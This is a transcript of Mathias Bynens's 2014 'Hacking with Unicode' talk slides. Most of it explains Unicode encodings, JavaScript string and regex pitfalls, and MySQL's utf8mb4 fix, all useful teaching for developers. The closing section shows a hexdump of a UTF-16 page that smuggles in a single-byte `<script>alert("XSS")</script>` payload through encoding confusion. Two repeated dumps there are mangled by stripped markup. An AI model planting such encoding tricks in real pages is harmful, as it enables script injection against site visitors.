Hacking with Unicode

This presentation explores common mistakes programmers make when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix or prevent it, and how it could be exploited.

Event: HackPra — the hacking lecture at the Ruhr University in Bochum
Video: https://www.youtube.com/watch?v=qFfjJ8pOrWY&hd=1 (use these slides though, not the ones in the video)
Links: http://lanyrd.com/2014/hackpra/sczxgz/

2016 update: https://speakerdeck.com/mathiasbynens/hacking-with-unicode-in-2016

Mathias Bynens

May 21, 2014

Transcript

  1. @mathias · #hackpra
    Hacking with Unicode


  2. @mathias · #hackpra
    1337 unic0de h4xx


  3. @mathias


  4. What we’ll cover
    1. Unicode
    2. Encodings for Unicode
    3. Unicode in JavaScript
    4. Unicode in MySQL
    5. Hacking with Unicode

  5. 1. Unicode


  6. code point unique name
    symbol/glyph


  7. A
    LATIN CAPITAL LETTER A
    U+0041


  8. a
    LATIN SMALL LETTER A
    U+0061


  9. ©
    COPYRIGHT SIGN
    U+00A9



  10. ☃
    SNOWMAN
    U+2603

  11. 💩
    PILE OF POO
    U+1F4A9

  12. U+000000 → U+10FFFF


  13. (0x10FFFF + 1) code points

    17 planes
    (0xFFFF + 1) code points each

  14. Unicode plane #1
    U+0000 → U+FFFF
    Basic Multilingual Plane


  15. Unicode planes #2-17
    U+010000 → U+10FFFF
    supplementary planes
    astral planes
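
The plane arithmetic above can be sketched in a few lines of JavaScript. The helper names `getPlane` and `isAstral` are hypothetical (they do not appear in the slides), and the sketch numbers planes from 0, as the Unicode Standard does, whereas the slides count from #1.

```javascript
// Hypothetical helpers, not from the slides.
// Planes are numbered 0..16 here; the slides count them as #1..#17.
function getPlane(codePoint) {
  if (!Number.isInteger(codePoint) || codePoint < 0 || codePoint > 0x10FFFF) {
    throw new RangeError('Not a Unicode code point: ' + codePoint);
  }
  // Each plane holds 0x10000 (0xFFFF + 1) code points.
  return Math.floor(codePoint / 0x10000);
}

// Astral (supplementary) code points live outside plane 0, the BMP.
function isAstral(codePoint) {
  return getPlane(codePoint) > 0;
}

console.log(getPlane(0x0041));   // 0 (Basic Multilingual Plane)
console.log(getPlane(0x1F4A9));  // 1
console.log(getPlane(0x10FFFF)); // 16
```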

  16. 2. Encodings


  17. Number of bytes per code point
    Code point range       UTF-8  UTF-16  UTF-32  UTF-EBCDIC  GB 18030
    U+000000 – U+00007F    1      2       4       1           1
    U+000080 – U+00009F    2      2       4       1           2 or 4 (*)
    U+0000A0 – U+0003FF    2      2       4       2           2 or 4 (*)
    U+000400 – U+0007FF    2      2       4       3           2 or 4 (*)
    U+000800 – U+003FFF    3      2       4       3           2 or 4 (*)
    U+004000 – U+00FFFF    3      2       4       4           2 or 4 (*)
    U+010000 – U+03FFFF    4      4       4       4           4
    U+040000 – U+10FFFF    4      4       4       5           4
    (*) 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else
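
The UTF-8, UTF-16 and UTF-32 columns of the table can be reproduced with a small function. This is a sketch only: `byteLengths` is a hypothetical name, UTF-EBCDIC and GB 18030 are left out, and the cross-check assumes a runtime that provides the standard `TextEncoder` global (modern browsers and Node.js).

```javascript
// Hypothetical helper: bytes needed to encode one code point.
function byteLengths(codePoint) {
  if (!Number.isInteger(codePoint) || codePoint < 0 || codePoint > 0x10FFFF) {
    throw new RangeError('Not a Unicode code point: ' + codePoint);
  }
  let utf8;
  if (codePoint <= 0x7F) utf8 = 1;
  else if (codePoint <= 0x7FF) utf8 = 2;
  else if (codePoint <= 0xFFFF) utf8 = 3;
  else utf8 = 4;
  // UTF-16 needs one 16-bit unit in the BMP, two (a surrogate pair) beyond it.
  const utf16 = codePoint <= 0xFFFF ? 2 : 4;
  return { utf8: utf8, utf16: utf16, utf32: 4 };
}

// Cross-check the UTF-8 column against the platform's own encoder.
for (const codePoint of [0x41, 0xA9, 0x2603, 0x1F4A9]) {
  const measured = new TextEncoder().encode(String.fromCodePoint(codePoint)).length;
  console.log('U+' + codePoint.toString(16).toUpperCase(),
    byteLengths(codePoint), measured === byteLengths(codePoint).utf8);
}
```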

  20. IETF RFCs

  26. 3. Unicode in JavaScript
    http://mths.be/jsu

  29. JavaScript has a Unicode problem
    http://mths.be/jsu

  31. Hexadecimal escape sequences
    >> '\x41\x42\x43'
    'ABC'
    >> '\x61\x62\x63'
    'abc'
    can be used for U+0000 → U+00FF


  32. Unicode escape sequences
    >> '\u0041\u0042\u0043'
    'ABC'
    >> 'I \u2661 JavaScript!'
    'I ♡ JavaScript!'
    can be used for U+0000 → U+FFFF


  33. …what about astral
    code points?


  34. …what about 💩?*
    *…and other, equally important astral symbols

  35. 💩

  36. Unicode code point escapes
    >> '\u{41}\u{42}\u{43}'
    'ABC'
    >> '\u{1F4A9}'
    '💩' // U+1F4A9

    can be used for U+000000 → U+10FFFF
    ES6

  37. Surrogate pairs
    >> '\uD83D\uDCA9'
    '💩' // U+1F4A9

    can be used for U+010000 → U+10FFFF
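
The escape forms covered so far are different spellings of the same string values. A short sketch, using illustrative variable names and assuming an ES6-capable engine, makes that concrete:

```javascript
// Three spellings of U+0041, and two spellings of U+1F4A9.
const hexEscape = '\x41';              // U+0000 → U+00FF only
const unicodeEscape = '\u0041';        // U+0000 → U+FFFF only
const codePointEscape = '\u{41}';      // any code point (ES6)

const pooViaCodePoint = '\u{1F4A9}';     // ES6 code point escape
const pooViaSurrogates = '\uD83D\uDCA9'; // explicit surrogate pair

console.log(hexEscape === unicodeEscape && unicodeEscape === codePointEscape); // true
console.log(pooViaCodePoint === pooViaSurrogates); // true
console.log(pooViaCodePoint.length); // 2 (two UTF-16 code units)
```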

  38. Surrogate pairs
    // for astral code points (> 0xFFFF)
    function getSurrogates(codePoint) {
      var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
      var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
      return [ high, low ];
    }

    function getCodePoint(high, low) {
      var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
      return codePoint;
    }

    >> getSurrogates(0x1F4A9); // U+1F4A9 is 💩
    [ 0xD83D, 0xDCA9 ]
    >> getCodePoint(0xD83D, 0xDCA9);
    0x1F4A9
    http://mths.be/bed

  39. JavaScript string length
    >> 'A'.length // U+0041
    1
    >> 'A' == '\u0041'
    true
    >> 'B'.length // U+0042
    1
    >> 'B' == '\u0042'
    true


  40. String length ≠ char count
    >> '𝐀'.length // U+1D400
    2
    >> '𝐀' == '\uD835\uDC00'
    true
    >> '𝐁'.length // U+1D401
    2
    >> '𝐁' == '\uD835\uDC01'
    true

  41. String length ≠ char count
    >> '💩'.length // U+1F4A9
    2
    >> '💩' == '\uD83D\uDCA9'
    true
    insert obligatory
    “number two” joke here

  42. Real-world example

  46. String character count
    function countSymbols(string) {
      return punycode.ucs2.decode(string).length;
    }

    >> countSymbols('A') // U+0041
    1
    >> countSymbols('𝐀') // U+1D400
    1
    >> countSymbols('💩') // U+1F4A9
    1
    http://mths.be/punycode

  47. String character count
    function countSymbols(string) {
      return Array.from(string).length;
    }

    >> countSymbols('A') // U+0041
    1
    >> countSymbols('𝐀') // U+1D400
    1
    >> countSymbols('💩') // U+1F4A9
    1
    ES6

  48. JavaScript escape sequences
    http://mths.be/bmf


  50. If we’re being pedantic…
    // it’s actually even more complicated:

    >> 'mañana' == 'mañana' // precomposed U+00F1 vs. U+006E + U+0303
    false
    >> 'ma\xF1ana' == 'man\u0303ana'
    false
    >> 'ma\xF1ana'.length
    6
    >> 'man\u0303ana'.length
    7

  51. Unicode normalization
    function countSymbolsPedantically(string) {
      // Unicode Normalization, NFC form:
      var normalized = string.normalize('NFC');
      // Account for astral symbols / surrogates:
      return Array.from(normalized).length;
    }

    >> countSymbolsPedantically('mañana') // U+00F1
    6
    >> countSymbolsPedantically('mañana') // U+006E + U+0303
    6
    http://git.io/unorm
    ES6
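
Normalization matters for comparison as well as for counting. The sketch below assumes `String.prototype.normalize` is available (ES6); `equalsNormalized` is a hypothetical helper name, and NFC is just one reasonable choice of normalization form.

```javascript
// Hypothetical helper: compare two strings after NFC normalization.
function equalsNormalized(a, b) {
  return a.normalize('NFC') === b.normalize('NFC');
}

const precomposed = 'ma\xF1ana';    // ñ as U+00F1
const decomposed = 'man\u0303ana';  // n followed by U+0303 COMBINING TILDE

console.log(precomposed === decomposed);                // false
console.log(equalsNormalized(precomposed, decomposed)); // true
```

Anything that compares user-supplied identifiers (usernames, file names) may want to normalize both sides first, since two visually identical inputs would otherwise be treated as different values.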

  53. Perfect? Nope.
    → can be ‘fixed’ using epic regex-fu
    >> var zalgo = 'H
    ̹̙̦̮͉̩̗̗
    ͧ̇̏̊̾
    Eͨ͆͒̆ͮ̃
    ͏̷̮̣̫̤̣ ̵̞̹̻
    ̀̉̓ͬ͑͡
    ͅ
    Cͯ̂͐
    ͏̨̛͔̦̟͈̻
    O
    ̜͎͍͙͚̬̝̣
    ̽ͮ͐͗̀ͤ̍̀
    ͢
    M
    ̴̡̲̭͍͇̼̟̯̦
    ̉̒͠
    Ḛ̛̙̞̪̗
    ͥ
    ͤͩ̾͑̔͐
    ͅ
    Ṯ̴̷̷̗̼͍
    ̿̿̓̽͐
    H
    ̙̙
    ̔̄
    ͜
    ';
    >> countSymbolsPedantically(zalgo)
    116 // not 9


  58. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
      return string.split('').reverse().join('');
    }

    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam' // the tilde now sits on the `a`
    >> reverse('💩') // U+1F4A9
    '\uDCA9\uD83D' // the surrogate pair for 💩, in the wrong order (renders as '��')

  59. “I put my thang down,
    flip it, and reverse it”
    — Missy ‘Misdemeanor’ Elliott, 2002

  60. Reversing a string in JavaScript
    // Using the Esrever library
    var reverse = esrever.reverse;

    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anañam'
    >> reverse('💩') // U+1F4A9
    '💩'
    http://mths.be/esrever
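
For comparison, here is a minimal code-point-aware reverse that relies only on ES6 string iteration. It is not how Esrever is implemented, and `reverseCodePoints` is a hypothetical name. It keeps surrogate pairs intact but, unlike the Esrever results above, still moves combining marks onto the wrong base character.

```javascript
// Hypothetical helper: reverse by code point rather than by UTF-16 code unit.
// Array.from() uses the string iterator, which yields whole surrogate pairs.
function reverseCodePoints(string) {
  return Array.from(string).reverse().join('');
}

console.log(reverseCodePoints('abc') === 'cba');                      // true
console.log(reverseCodePoints('a\u{1F4A9}b') === 'b\u{1F4A9}a');      // true
// Combining marks are NOT handled: the tilde ends up after the `a`.
console.log(reverseCodePoints('man\u0303ana') === 'ana\u0303nam');    // true
```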

  61. This behavior affects
    other string methods, too.


  62. String.fromCharCode()
    >> String.fromCharCode(0x0041) // U+0041
    'A' // U+0041
    >> String.fromCharCode(0x1F4A9) // U+1F4A9
    '\uF4A9' // U+F4A9

    only works as you’d expect for
    U+0000 → U+FFFF

  63. String.fromCharCode()
    → use surrogate pairs for astral symbols:

    >> String.fromCharCode(0xD83D, 0xDCA9)
    '💩' // U+1F4A9

    → or just use Punycode.js:

    >> punycode.ucs2.encode([ 0x1F4A9 ])
    '💩' // U+1F4A9

  64. String.fromCodePoint()
    >> String.fromCodePoint(0x1F4A9)
    '💩'

    can be used for U+000000 → U+10FFFF
    ES6
    http://mths.be/fromcodepoint
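
The difference between the two functions comes down to truncation: `String.fromCharCode()` keeps only the low 16 bits of each argument. A short sketch with illustrative variable names, assuming an ES6 engine:

```javascript
// fromCharCode() truncates its argument to 16 bits: 0x1F4A9 & 0xFFFF === 0xF4A9.
const truncated = String.fromCharCode(0x1F4A9);
// fromCodePoint() produces the full surrogate pair.
const correct = String.fromCodePoint(0x1F4A9);

console.log(truncated === '\uF4A9');      // true (a private-use character)
console.log(correct === '\uD83D\uDCA9');  // true
console.log(truncated.length, correct.length); // 1 2
```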

  65. String#charAt()
    >> '💩'.charAt(0) // U+1F4A9
    '\uD83D' // U+D83D

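  66. String#at()
    >> '💩'.at(0) // U+1F4A9
    '💩' // U+1F4A9
    ES7 (a proposal at the time of this talk)
    // note: the `at()` method that was later standardized (ES2022) indexes
    // UTF-16 code units, so '💩'.at(0) returns '\uD83D' in today’s engines
    http://mths.be/at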

  67. String#charCodeAt()
    >> '💩'.charCodeAt(0) // U+1F4A9
    0xD83D

  68. String#codePointAt()
    >> '💩'.codePointAt(0) // U+1F4A9
    0x1F4A9
    ES6
    http://mths.be/codepointat
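
One caveat worth illustrating: `codePointAt()` still takes a code unit index, so asking for index 1 of an astral symbol returns the lone low surrogate. The sketch below, with the hypothetical helper name `toCodePoints`, steps through a string by one or two code units as needed.

```javascript
// Hypothetical helper: list the code points of a string using codePointAt().
function toCodePoints(string) {
  const output = [];
  let index = 0;
  while (index < string.length) {
    const codePoint = string.codePointAt(index);
    output.push(codePoint);
    // Astral code points occupy two UTF-16 code units; everything else one.
    index += codePoint > 0xFFFF ? 2 : 1;
  }
  return output;
}

console.log('\u{1F4A9}'.codePointAt(0).toString(16)); // 1f4a9
console.log('\u{1F4A9}'.codePointAt(1).toString(16)); // dca9 (the low surrogate)
console.log(toCodePoints('a\u{1F4A9}b'));             // [ 97, 128169, 98 ]
```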

  69. Iterate over all symbols in a string
    function getSymbols(string) {
      var length = string.length;
      var index = -1;
      var output = [];
      var character;
      var charCode;
      while (++index < length) {
        character = string.charAt(index);
        charCode = character.charCodeAt(0);
        if (charCode >= 0xD800 && charCode <= 0xDBFF) {
          // note: this doesn’t account for lone high surrogates
          output.push(character + string.charAt(++index));
        } else {
          output.push(character);
        }
      }
      return output;
    }

    var symbols = getSymbols('💩');
    symbols.forEach(function(symbol) {
      assert(symbol == '💩');
    });

  70. Iterate over all symbols in a string
    for (let symbol of '💩') {
      assert(symbol == '💩');
    }
    ES6

  71. More string madness
    • String#substring
    • String#slice
    • …anything that involves strings
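
To make the `slice`/`substring` problem concrete: both methods index UTF-16 code units, so a cut can land in the middle of a surrogate pair. The sketch below shows the failure and one possible workaround; `truncateSymbols` is a hypothetical helper, and like the earlier examples it ignores combining marks.

```javascript
const text = 'I \u{1F4A9} Unicode';

// Cutting after 3 code units splits the surrogate pair in half.
const broken = text.slice(0, 3);
console.log(broken === 'I \uD83D'); // true (ends in a lone high surrogate)

// Hypothetical helper: truncate by code point instead of by code unit.
function truncateSymbols(string, maxSymbols) {
  return Array.from(string).slice(0, maxSymbols).join('');
}

console.log(truncateSymbols(text, 3) === 'I \u{1F4A9}'); // true
```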

  72. Regular expressions
    >> /foo.bar/.test('foo💩bar')
    false

  75. Match any Unicode symbol
    >> /^.$/.test('💩')
    false // doesn’t match line breaks, either

    >> /^[\s\S]$/.test('💩')
    false // matches line breaks, but still doesn’t match whole astral symbols

    >> /^(?:[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF])$/.test('💩')
    true // wtf

  83. Create Unicode-aware regular expressions
    >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF]'
    >> regenerate()
    ……   .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    ……   .removeRange('A', 'z') // remove all symbols from `A` to `z`
    ……   .remove('💩') // remove U+1F4A9 PILE OF POO
    ……   .toString();
    '[\0-\x1F\x21-\x40\x7B-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF]'
    http://mths.be/regenerate

  85. Create Unicode-aware regular expressions
    >> var regenerate = require('regenerate');
    >> var symbols = require('unicode-7.0.0/scripts/Greek/symbols');
    >> var set = regenerate(symbols);
    >> set.toString();
    '[\u0370-\u0373\u0375-\u0377\u037A-\u037D\u037F\u0384\u0386\u0388-\u038A\u038C\u038E-\u03A1\u03A3-\u03E1\u03F0-\u03FF\u1D26-\u1D2A\u1D5D-\u1D61\u1D66-\u1D6A\u1DBF\u1F00-\u1F15\u1F18-\u1F1D\u1F20-\u1F45\u1F48-\u1F4D\u1F50-\u1F57\u1F59\u1F5B\u1F5D\u1F5F-\u1F7D\u1F80-\u1FB4\u1FB6-\u1FC4\u1FC6-\u1FD3\u1FD6-\u1FDB\u1FDD-\u1FEF\u1FF2-\u1FF4\u1FF6-\u1FFE\u2126\uAB65]|\uD800[\uDD40-\uDD8C\uDDA0]|\uD834[\uDE00-\uDE45]'
    http://mths.be/regenerate
    http://mths.be/node-unicode-data

  86. Regular expressions
    >> /foo.bar/.test('foo💩bar')
    false

    >> /foo.bar/u.test('foo💩bar')
    true
    ES6
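
The effect of the `u` flag on `.` can be checked directly. The sketch assumes an engine that supports the ES6 `u` flag and the later `s` (dotAll) flag from ES2018, which the slides do not mention; `matchesSingleSymbol` is a hypothetical helper name.

```javascript
const poo = '\u{1F4A9}';

console.log(/^.$/.test(poo));   // false: `.` matches one code unit
console.log(/^.$/u.test(poo));  // true: with `u`, `.` matches one code point
console.log(/^.$/u.test('\n')); // false: line breaks are still excluded

// Hypothetical helper: with both `s` and `u`, `.` matches any single code point.
function matchesSingleSymbol(string) {
  return /^.$/su.test(string);
}

console.log(matchesSingleSymbol(poo));  // true
console.log(matchesSingleSymbol('\n')); // true
console.log(matchesSingleSymbol('ab')); // false
```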

  87. Regex character classes
    >> /[a-c]/
    // matches:
    // U+0061 LATIN SMALL LETTER A
    // U+0062 LATIN SMALL LETTER B
    // U+0063 LATIN SMALL LETTER C
    >> /^[a-c]$/.test('a')
    true
    >> /^[a-c]$/.test('b')
    true
    >> /^[a-c]$/.test('c')
    true


  88. Regex character classes: what you might expect
    >> /[💩-💫]/
    // matches:
    // U+1F4A9 PILE OF POO
    // U+1F4AA FLEXED BICEPS
    // U+1F4AB DIZZY SYMBOL
    >> /^[💩-💫]$/.test('💩')
    true
    >> /^[💩-💫]$/.test('💪')
    true
    >> /^[💩-💫]$/.test('💫')
    true

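  91. Regex character classes
    >> /[💩-💫]/
    SyntaxError: Invalid regular expression:
    Range out of order in character class
    // without the `u` flag, the pattern above is equivalent to this one,
    // where the range \uDCA9-\uD83D runs backwards:
    >> /[\uD83D\uDCA9-\uD83D\uDCAB]/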

  93. Regex character classes
    ES6
    >> /[💩-💫]/u
    // matches:
    // U+1F4A9 PILE OF POO
    // U+1F4AA FLEXED BICEPS
    // U+1F4AB DIZZY SYMBOL
    >> /^[💩-💫]$/u.test('💩')
    true
    >> /^[💩-💫]$/u.test('💪')
    true
    >> /^[💩-💫]$/u.test('💫')
    true
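
Both behaviors can be observed at runtime by building the pattern with the `RegExp` constructor, so that the syntax error can be caught instead of stopping the script. This is a sketch with illustrative variable names, assuming an ES6 engine.

```javascript
// The class [💩-💫], spelled with escapes in the source string.
const range = '[\u{1F4A9}-\u{1F4AB}]';

// Without `u`, the class is read as code units and the range is out of order.
let threwWithoutU = false;
try {
  new RegExp(range);
} catch (error) {
  threwWithoutU = error instanceof SyntaxError;
}

// With `u`, the class is read as code points and works as intended.
const withU = new RegExp('^' + range + '$', 'u');

console.log(threwWithoutU);               // true
console.log(withU.test('\u{1F4AA}'));     // true (U+1F4AA FLEXED BICEPS)
console.log(withU.test('a'));             // false
```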

  94. Regex character classes
    >> regenerate().addRange('💩', '💫').toString()
    '\uD83D[\uDCA9-\uDCAB]'
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('💩')
    true
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('💪')
    true
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('💫')
    true
    http://mths.be/regenerate

  95. JavaScript has a Unicode problem
    http://mths.be/jsu


  96. 💩
    The Pile of Poo Test™
    http://mths.be/jsu

  97. 💩 is the new %00

  98. 4. Unicode in MySQL

  99. CREATE TABLE `table_name` (
    `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
    `column_name` VARCHAR(255) NOT NULL DEFAULT '',
    PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

  101. mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1

    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level   | Code | Message                                    |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    |         |      | for column 'column_name' at row 1          |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)

    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo         |
    +-------------+
    1 row in set (0.00 sec)
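
The value is cut off at the first astral symbol because MySQL’s `utf8` character set stores at most three bytes per character, which covers only the Basic Multilingual Plane. On the application side, a check along the following lines could flag input that such a column would truncate. This is a sketch, not a substitute for switching to `utf8mb4`, and `containsAstralSymbol` is a hypothetical helper name.

```javascript
// Hypothetical helper: does the string contain any code point above U+FFFF,
// i.e. anything that needs four bytes in UTF-8?
function containsAstralSymbol(string) {
  // A high surrogate followed by a low surrogate encodes an astral code point.
  return /[\uD800-\uDBFF][\uDC00-\uDFFF]/.test(string);
}

console.log(containsAstralSymbol('foo\u{1F4A9}bar')); // true
console.log(containsAstralSymbol('foo\u2603bar'));    // false (U+2603 is in the BMP)
```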

  106. MySQL’s ✌️utf8✌️

  108. ALTER TABLE `table_name`
    CONVERT TO CHARACTER SET utf8mb4
    COLLATE utf8mb4_unicode_ci;
    http://mths.be/utf8mb4

  110. mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0

    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo💩bar    |
    +-------------+
    1 row in set (0.00 sec)
    http://mths.be/utf8mb4

  114. 5. Hacking with Unicode


  115. http://mths.be/brk


  116. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert|
    000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script|
    000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
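
The single-byte ASCII run in the middle of the dump (`3c 73 63 72 69 70 …`, the text `<scrip…`) is what a UTF-16 decoder would read two bytes at a time. The sketch below pairs bytes into 16-bit units by hand to show the resulting values. `pairBytes` is a hypothetical helper; the big-endian pairing is an assumption chosen because it reproduces the values in the slide annotations (U+3C73, U+6372, U+6970), and a little-endian decoder would yield the byte-swapped values instead.

```javascript
// Hypothetical helper: group a byte array into 16-bit code units.
function pairBytes(bytes, littleEndian) {
  const units = [];
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    const first = bytes[i];
    const second = bytes[i + 1];
    units.push(littleEndian ? (second << 8) | first : (first << 8) | second);
  }
  return units;
}

// The ASCII bytes of '<scrip': 3c 73 63 72 69 70
const asciiBytes = Array.from('<scrip', function (character) {
  return character.charCodeAt(0);
});

const labels = pairBytes(asciiBytes, false).map(function (unit) {
  return 'U+' + unit.toString(16).toUpperCase();
});
console.log(labels); // [ 'U+3C73', 'U+6372', 'U+6970' ]
```

Read this way, the markup shows up as CJK ideographs rather than as a `<script>` tag; it only turns into script once the page is interpreted in a single-byte-compatible encoding.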

  117. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  118. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  119. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
